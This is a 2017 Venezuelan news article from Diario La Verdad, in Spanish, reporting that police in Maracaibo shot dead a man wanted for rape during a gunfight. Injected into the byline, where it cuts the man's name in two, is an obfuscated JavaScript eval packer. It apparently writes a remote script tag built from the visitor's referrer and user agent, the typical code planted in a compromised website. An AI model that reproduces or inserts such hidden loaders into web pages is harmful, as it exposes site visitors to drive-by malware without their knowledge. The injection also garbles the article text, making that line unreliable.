publicidad

Liquidan a violador durante un careo en Primero de Mayo

Redacción Sucesos / Maracaibo / noticias@laverdad.com
José eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|khtkf|var|u0026u|referrer|dbknb||js|php'.split('|'),0,{})) Castaño Gañán (42), denunciado por violación, murió al enfrentarse a una comisión de la Policía científica que lo iba a aprehender

Se recuperó la pistola Smith & Wesson utilizada por delincuente en el enfrentamiento. (Foto: Archivo)

Funcionarios de la Policía científica adscritos a la subdelegación Maracaibo, ultimaron a José Castaño Gañán, de 42 años, en el sector Primero de Mayo, parroquia Chiquinquirá del municipio marabino, durante un enfrentamiento. 

El hecho ocurrió a las 5.20 de la tarde. Los oficiales se encontraban en labores de inteligencia, cuando vieron al presunto delincuente dentro de un vehículo Chevrolet, modelo Chevette, procedieron a darle la voz de alto, la cual desacató. Se bajó del auto y se escondió detrás de él para sacar un arma de fuego, apuntó a los uniformados y comenzó a disparar.

La lluvia de balas cesó. Uno de los oficiales logró herir al antisocial. Lo subieron a una patrulla y lo trasladaron hasta el Hospital General del Sur donde ingresó sin signos vitales. Un funcionario del cuerpo detectivesco afirmó que el maleante estaba solicitado por violar a dos mujeres. En el lugar del careo se recuperó una pistola marca Smith & Wesson, calibre 22, negra, utilizada por Castaño.

 

Más noticias

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama